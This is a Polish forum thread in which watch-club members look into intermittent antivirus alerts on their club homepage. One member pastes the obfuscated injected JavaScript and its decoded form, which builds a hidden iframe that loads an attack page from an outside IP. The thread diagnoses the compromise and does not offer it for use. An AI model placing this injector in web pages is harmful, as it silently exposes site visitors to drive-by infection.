zlosliwy kod 2

[DawPi 522]

Witam,

oto odpowiedź administracji serwera:

Niestety z naszej strony nie zauważamy żadnego problemu. Ze screenów znalezionych na Państwa forum wynika, że antywirus AVG źle interpretuje kod javascript zawarty na stronie. Z naszych informacji wynika, że przyczyną fałszywych alarmów mogą być błąd w programie antywirusowym AVG. Opis podobnego błędu można znaleźć na stronie http://forum.gazeta.pl/forum/w,430,124942106,124942106,jak_sie_pozbyc_zlosliwego_oprogramowania.html

[Jaro_swatcH 1238]

Eset NOD32 wykrył dzisiaj u mnie

JS/Iframe koń trojański i zablokował stronę zegarkiclub.pl (strona została dodana do kwarantanny ręcznie ją przywróciłem, nie wiem czy bezpiecznie...)

[Taktic 40]

..strona została dodana do kwarantanny ręcznie ją przywróciłem, nie wiem czy bezpiecznie...)

Ja radzę nie otwierać. Taki kod otwiera na stronie niewidoczną ramkę (iframe), a następnie w tej ramce próbuje otworzyć zainfekowane dokumenty skompilowane typu pdf, doc, xls itp... i w ten sposób pośrednio zainfekować komputer. To nie jest tak, że zawsze się uda zainfekować komputer, bo to zależy również od samych programów "źródłowych" dla tych dokumentów (Adobe, Office...) czy są bezpieczne, aktualizowane itp.. Ale lepiej nie ryzykować, jak nie ma potrzeby.

[Tomasz Sitkowski 8]

Cześć piszę jeszcze raz, bo mój temat który otworzyłem został zamknięty. Jeszcze raz piszę, że nie znam się na technicznej sprwie, ale jako uczestnik Forum, wydaje mi się, że mam prawo do bezpiecznego jego odwiedzania. Z obserwacji różnych wypowiedzi nie mogę wywnioskować, że odwiedzanie Forum jest bez wątpienia bezpieczne.

Prosiłbym zatem autorytatywne osoby o jasną wypowiedż, jea to jest z zapewnieniem bezpieczeństwa uczestnikom Forum. Jest ważne pytanie, na które trzeba jednoznacznie odpowiedzieć przez osoby administrujące. Jestem czlonkiem Klubu od bez mała samego początku ora członkiem Stowarzyszenia i chciałbym, aby tak było dalej, ale na bezpiecznych warunkach.

Pozdrowienia Tomek

[Taktic 40]

Z obserwacji różnych wypowiedzi nie mogę wywnioskować, że odwiedzanie Forum jest bez wątpienia bezpieczne.

Jak dotychczas atakowana jest tylko główna strona klubu (na domenie), natomiast forum jest w podkatalogu /forum/, i samo forum nie jest atakowane, przynajmniej na razie...

[Tomasz Sitkowski 8]

Przy ponownym wejściu, obecnie (godz. 20.42) przy otwieraniu Forum zgłosił mi się komunikat: PDM.Trojan.generic oraz zalecenia: 1) wylecz i uruchom ponownie 2) nie uruchamiaj.

Tomek

[Piotr Ratyński 407]

Przy ponownym wejściu, obecnie (godz. 20.42) przy otwieraniu Forum zgłosił mi się komunikat: PDM.Trojan.generic oraz zalecenia: 1) wylecz i uruchom ponownie 2) nie uruchamiaj.

Tomek

Mam znakomitego płatnego antywirusa, który również monitoruje mi strony internetowe. Jeszcze nigdy mnie nie zawiódł a tutaj milczy.

[Tomasz Sitkowski 8]

Drodzy Koledzy, czy są u nas na Forum odpowiedzialni administratorzy ?, którzy moga rozwiązać problem, przed chwilą przy próbie wejścia na strony klubowe miałem następny atak Trojana, nie moge i nie chcę ryzykować. Może zamiast dyskutować, ktoś nareszcie zajmie się konkretnie tą sprwaą.Jeżeli nie możemy we własnym gronie rozwiązać problemu, to trzeba sięgnąć po ludzi, ktorzy mogą coś zrobic w tej sprawie.

TS

[dariusz chlastawa 589]

Wg naszym adminow to jest falszywy alarm a nie trojan . Błędna interpretacja niektórych programów antywirusowych.

[Pablos_ 16]

Jeśli ktoś ma obawy to czy tak trudno wejść na forum bezpośrednio z adresu http://zegarkiclub.pl/forum ?

Tak poza tym jeśli to fałszywy alarm to dlaczego kod raz się pojawia, a potem znika? To na pewno nie jest normalne. Na dodatek oprócz programów antywirusowych na różnych silnikach, również mechanizmy przeglądarek tak go kwalifikują. Chyba nikt mi nie wmówi, że to false positive.

[Piotr Ratyński 407]

Drodzy Koledzy, czy są u nas na Forum odpowiedzialni administratorzy ?, którzy moga rozwiązać problem, przed chwilą przy próbie wejścia na strony klubowe miałem następny atak Trojana, nie moge i nie chcę ryzykować. Może zamiast dyskutować, ktoś nareszcie zajmie się konkretnie tą sprwaą.Jeżeli nie możemy we własnym gronie rozwiązać problemu, to trzeba sięgnąć po ludzi, ktorzy mogą coś zrobic w tej sprawie.

TS

No cóż dla mnie jest logiczne, że do usunięcia jakiegoś problemu trzeba żeby on był. Drogi kolego, co to jest "atak Trojana" ??? W ogóle jak trojan może zaszkodzić komuś kto go nie pobierze na swój komputer? Przecież żaden antywirus na to nie pozwoli, no chyba że się ma coś naprawdę kiepskiego.

Mój antywirus GData nadal nie zgłasza żadnego niebezpieczeństwa na forum i Kasperski syna również, strona klubowa też obecnie czysta, jak było na niej wcześniej nie wiem.

[tarant 2980]

Avast także dołącza do programów znajdujących trojana.....

Jak widać, wskazania zaczynają rozkładać się pół na pół....

 

[Piotr Ratyński 407]

Avast także dołącza do programów znajdujących trojana.....

Jak widać, wskazania zaczynają rozkładać się pół na pół....

Hmm... Powiem tak, moim zdaniem na antywirusa nie należy żałować pieniędzy i nie jest moim celem żeby komukolwiek dogadać, tylko takie są fakty.

[Pablos_ 16]

Możecie sobie rozprawiać o antywirusach (akurat darmowy Avast bije beznadziejny GData na głowę), ale strona była blokowana przez mechanizmy zabezpieczające przeglądarek (przeglądarka spr czy strona jest na czarnej liście i nie można uzyskać połączenia, a to już nie ma nic wspólnego kto ma jakiego antywira).

[dariusz chlastawa 589]

admin strony pracuje z adminami hostu aby to usunąć , na razie diagnoza jest ,że to statystyki GA

[Piotr Ratyński 407]

Możecie sobie rozprawiać o antywirusach (akurat darmowy Avast bije beznadziejny GData na głowę), ale strona była blokowana przez mechanizmy zabezpieczające przeglądarek (przeglądarka spr czy strona jest na czarnej liście i nie można uzyskać połączenia, a to już nie ma nic wspólnego kto ma jakiego antywira).

No właśnie, że ma, bo mój beznadziejny GData blokuje złośliwy kod zanim go pobiorę na komputer, w odróżnieniu od rewelacyjnego Avasta który robi larum dopiero jak kod siedzi już na kompie. Widocznie jestem wyjątkowym szczęściarzem, bo jakoś po zmianie Avasta na GData nie miałem od lat na kompie nic paskudnego. No i właśnie dlatego nie obawiam się przeglądania zainfeko0wanych stron internetowych i tyle. Co oczywiście nie zmienia postaci rzeczy, że taką infekcję na stronie należy usunąć i i odpowiednio zabezpieczyć się na przyszłość. Jednak powtórzę, ani GData, ani Kasperski w tej chwili nie stwierdzają zadnych zagrożeń, jak bylo wcześniej poprostu nie wiem.

[Taktic 40]

Jednak powtórzę, ani GData, ani Kasperski w tej chwili nie stwierdzają zadnych zagrożeń, jak bylo wcześniej poprostu nie wiem.

Tu była (jest?) jakaś metoda periodyczna. Złośliwy kod pojawiał się i znikał. Częściej go nie było niż był. W tej chwili go nie ma. Jak będzie jutro, pojutrze... to nie wiem..

[Taktic 40]

Panowie, nie odbiegamy od tematu. Swoje wzajemne cechy charakteru analizujemy ewentualnie na PW

 

 

admin strony pracuje z adminami hostu aby to usunąć , na razie diagnoza jest ,że to statystyki GA

Jak mówiłem, złośliwy kod pojawia się okresowo.

Z mojego punktu widzenia, sprawa wygląda dość pociesznie. Bo wydaje się, że kod złośliwy pojawia się od czasu do czasu poza godzinami pracy panów administratorów z home.pl (najczęściej późnym popołudniem lub wieczorkiem). No a jak wiadomo, po pracy to się zimne piwko popija, a nie analizuje kody No więc problemu jakby nima

 

Przed chwilą robal się znowu pojawił. Podaję screena sprzed chwili. Tym razem większego, żeby widać było robala w całości.

Jeśli zaś nadal będą twierdzić, że to tylko antywirusy nie odróżniają kodu GA, to ja więcej pytań do panów administratorów nie mam, bo mi się już po prostu nie kce... no chyba że będę miał do opchnięcia most Brooklyński, albo trzydolarowy banknot, albo plastikowego Rolexa, to się wtedy do panów administratorów zgłoszę z ofertą

 

[Piotr Ratyński 407]

Ktoś się bawi w kotka i myszkę, ale administracja serwera moim zdaniem powinna sobie dać z tym radę bez problemu.

[Krzyzol 4]

Optymizm Moderatorów, przynajmniej jednego z nich nie jest niestety zaraźliwy. W dodatku, w moim odczuciu zupełnie nieuzasadniony. Wydaje mi się, obsługa techniczna się z tym morduje już wystarczająco długo.

[danadam 0]

Przez weekend tylko raz zuważyłem, wczoraj o 14:09:11

</tr></table>
</center>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-2339071-2";
urchinTracker();
</script>
</body>
</html><CR><script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="3.5$3.5$51.5$50$15$19$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$48$54.5$49$59.5$18.5$19.5$44.5$23$45.5$19.5$60.5$5.5$3.5$3.5$3.5$51.5$50$56$47.5$53.5$49.5$56$19$19.5$28.5$5.5$3.5$3.5$61.5$15$49.5$53$56.5$49.5$15$60.5$5.5$3.5$3.5$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$58.5$56$51.5$57$49.5$19$16$29$51.5$50$56$47.5$53.5$49.5$15$56.5$56$48.5$29.5$18.5$51$57$57$55$28$22.5$22.5$23.5$26.5$27$22$23.5$26$24$22$23.5$24.5$24$22$23.5$23$25.5$22.5$27.5$24.5$27.5$24.5$24$26.5$26.5$26.5$22$51$57$53.5$53$18.5$15$58.5$51.5$49$57$51$29.5$18.5$23.5$23$18.5$15$51$49.5$51.5$50.5$51$57$29.5$18.5$23.5$23$18.5$15$56.5$57$59.5$53$49.5$29.5$18.5$58$51.5$56.5$51.5$48$51.5$53$51.5$57$59.5$28$51$51.5$49$49$49.5$54$28.5$55$54.5$56.5$51.5$57$51.5$54.5$54$28$47.5$48$56.5$54.5$53$57.5$57$49.5$28.5$53$49.5$50$57$28$23$28.5$57$54.5$55$28$23$28.5$18.5$30$29$22.5$51.5$50$56$47.5$53.5$49.5$30$16$19.5$28.5$5.5$3.5$3.5$61.5$5.5$3.5$3.5$50$57.5$54$48.5$57$51.5$54.5$54$15$51.5$50$56$47.5$53.5$49.5$56$19$19.5$60.5$5.5$3.5$3.5$3.5$58$47.5$56$15$50$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$51.5$50$56$47.5$53.5$49.5$18.5$19.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$56.5$56$48.5$18.5$21$18.5$51$57$57$55$28$22.5$22.5$23.5$26.5$27$22$23.5$26$24$22$23.5$24.5$24$22$23.5$23$25.5$22.5$27.5$24.5$27.5$24.5$24$26.5$26.5$26.5$22$51$57$53.5$53$18.5$19.5$28.5$50$22$56.5$57$59.5$53$49.5$22$58$51.5$56.5$51.5$48$51.5$53$51.5$57$59.5$29.5$18.5$51$51.5$49$49$49.5$54$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$55$54.5$56.5$51.5$57$51.5$54.5$54$29.5$18.5$47.5$48$56.5$54.5$53$57.5$57$49.5$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$53$49.5$50$57$29.5$18.5$23$18.5$28.5$50$22$56.5$57$59.5$53$49.5$22$57$54.5$55$29.5$18.5$23$18.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$58.5$51.5$49$57$51$18.5$21$18.5$23.5$23$18.5$19.5$28.5$50$22$56.5$49.5$57$31.5$57$57$56$51.5$48$57.5$57$49.5$19$18.5$51$49.5$51.5$50.5$51$57$18.5$21$18.5$23.5$23$18.5$19.5$28.5$5.5$3.5$3.5$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$48$54.5$49$59.5$18.5$19.5$44.5$23$45.5$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$50$19.5$28.5$5.5$3.5$3.5$61.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-581!=0;i++){j=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}</script>

To co jest po </html> to ostatecznie taki kod:

 

if (document.getElementsByTagName('body')[0]){
   iframer();
}
else {
   document.write("");
}
function iframer(){
   var f = document.createElement('iframe');
   f.setAttribute('src','http://178.162.132.105/93932777.html');
       f.style.visibility='hidden';
       f.style.position='absolute';
       f.style.left='0';
       f.style.top='0';
       f.setAttribute('width','10');
       f.setAttribute('height','10');
       document.getElementsByTagName('body')[0].appendChild(f);
}

 

Taka ciekawostka jaką jeszcze zauważyłem. W kodzie strony wszystkie znaki nowej linii to LF (kod ascii: 10). Wszystkie z wyjątkiem tego za tagiem </html>. Po </html>, niezależnie czy kod się dokleja czy nie, zawsze jest znak CR (kod ascii: 13).

[Piotr Ratyński 407]

Optymizm Moderatorów, przynajmniej jednego z nich nie jest niestety zaraźliwy. W dodatku, w moim odczuciu zupełnie nieuzasadniony. Wydaje mi się, obsługa techniczna się z tym morduje już wystarczająco długo.

No właśnie, że się nie morduje, tylko uznaje, że tego nie ma, ale w końcu chyba dostaną te skany. a ja tylko nie dodałem do mojej wypowiedzi słowa "wreszcie"

Edit:

Ktoś się bawi w kotka i myszkę, ale administracja serwera moim zdaniem powinna sobie wreszcie dać z tym radę bez problemu.

[Taktic 40]

To co jest po </html> to ostatecznie taki kod:

@dandam, umieściłeś to w formie tekstowej... i sama próba odpowiedzi (przycisk Odpowiedz) uruchamia u mnie ochronę rezydentną Po odkodowaniu widać, że to klasyczny exploit, czyli kod javascript tworzący ukrytą ramkę iframe, do której ładowana jest strona dokonująca ataków.

 

 

Ktoś się bawi w kotka i myszkę...

Nie doszukuj się teorii spiskowych..

Taki periodyczny kod jest logicznym algorytmem. Hakerzy atakują setki dużych serwisów i portali. A takie pojawiające się i znikające kody, w sensie statystycznym pozwalają na zwiększenie szansy unikania skanerów, i pozwalają na dłuższe przetrwanie. Na przykład takiemu skanerowi Google jeszcze nie udało się trafić na złośliwy kod, choć odwiedza nas co kilka dni, a nawet dzisiaj odwiedził -> http://google.com/safebrowsing/diagnostic?site=zegarkiclub.pl/&hl=pl

Przy okazji powstaje też efekt socjotechniczny (jak widać w naszym przykładzie skuteczny), użytkownicy i administratorzy, zamiast zająć się usuwaniem problemu, kłócą się między sobą, czy jest wirus, czy go nie ma

[danadam 0]

@dandam, umieściłeś to w formie tekstowej... i sama próba odpowiedzi (przycisk Odpowiedz) uruchamia u mnie ochronę rezydentną

Hm.. Tego się nie spodziewałem

[Piotr Ratyński 407]

Nie doszukuj się teorii spiskowych..

Taki periodyczny kod jest logicznym algorytmem. Hakerzy atakują setki dużych serwisów i portali. A takie pojawiające się i znikające kody, w sensie statystycznym pozwalają na zwiększenie szansy unikania skanerów, i pozwalają na dłuższe przetrwanie.

Czyli tak czy owak ktoś się bawi w kotka i myszkę, tyle że automatycznie.

 

Przy okazji powstaje też efekt socjotechniczny (jak widać w naszym przykładzie skuteczny), użytkownicy i administratorzy, zamiast zająć się usuwaniem problemu, kłócą się między sobą, czy jest wirus, czy go nie ma

No kłótnia to może jeszcze nie jest, ale to zamiast gdy się nadmiernie przeciąga jest trochę drażniące...